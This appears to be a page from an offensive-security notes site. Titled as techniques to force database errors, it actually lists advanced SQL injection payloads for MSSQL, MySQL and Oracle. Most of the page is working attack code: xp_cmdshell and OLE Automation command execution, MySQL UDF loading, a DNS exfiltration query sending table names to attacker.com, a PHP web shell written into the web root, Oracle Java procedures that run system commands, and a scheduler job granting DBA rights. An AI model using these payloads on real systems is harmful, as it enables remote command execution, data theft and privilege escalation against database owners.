⁉️Techniques to Force Errors from Databases for SQL Injection

Below are some advanced and rare SQL injection techniques for MSSQL, MySQL, and Oracle. These techniques go beyond the basic ones and exploit specific features and configurations of the databases.

MSSQL

OLE Automation Procedures

DECLARE @Object INT;
EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;
EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';

This uses OLE Automation procedures to execute system commands.

XP_CMD Shell with Privilege Escalation

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

This enables xp_cmdshell to execute system commands if it's not already enabled.

Linked Servers

EXEC sp_addlinkedserver 'attacker_server';
EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password';
EXEC ('xp_cmdshell ''net user''') AT attacker_server;

This technique uses linked servers to run commands on a different server.

MySQL

UDF (User Defined Functions) for Remote Command Execution

CREATE TABLE foo(line BLOB);
INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so'));
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');

This technique involves creating a UDF to execute system commands.

DNS Exfiltration

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));

This exfiltrates data through DNS requests to an attacker-controlled domain.

Binary Log Injections

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

This exploits the binary log feature to write a web shell.

Oracle

Java Procedures for Command Execution

EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' );
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
import java.io.*;
public class cmd {
   public static String run(String cmd) {
      try {
         StringBuffer output = new StringBuffer();
         Process p = Runtime.getRuntime().exec(cmd);
         BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
         String line = "";
         while ((line = reader.readLine())!= null) {
            output.append(line + "\n");
         }
         return output.toString();
      } catch (Exception e) {
         return e.toString();
      }
   }
};
/

CREATE OR REPLACE FUNCTION run_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'cmd.run(java.lang.String) return java.lang.String';
/

SELECT run_cmd('id') FROM dual;

This uses Java stored procedures to execute system commands.

UTL_FILE Package for File Access

DECLARE
   l_file UTL_FILE.FILE_TYPE;
   l_text VARCHAR2(32767);
BEGIN
   l_file := UTL_FILE.FOPEN('DIRECTORY_NAME', 'output.txt', 'W');
   UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE');
   UTL_FILE.FCLOSE(l_file);
END;

This technique uses the UTL_FILE package to write files to the server.

DBMS_SCHEDULER for Job Execution

BEGIN
   DBMS_SCHEDULER.create_job(
      job_name => 'job1',
      job_type => 'PLSQL_BLOCK',
      job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;',
      start_date => SYSTIMESTAMP,
      repeat_interval => NULL,
      end_date => NULL,
      enabled => TRUE
   );
END;

This uses DBMS_SCHEDULER to execute jobs that can change database permissions.

PreviousSome More Advanced Payloads and Explanation.NextTechniques to Force Errors from Databases for SQL Injection

Last updated 4 months ago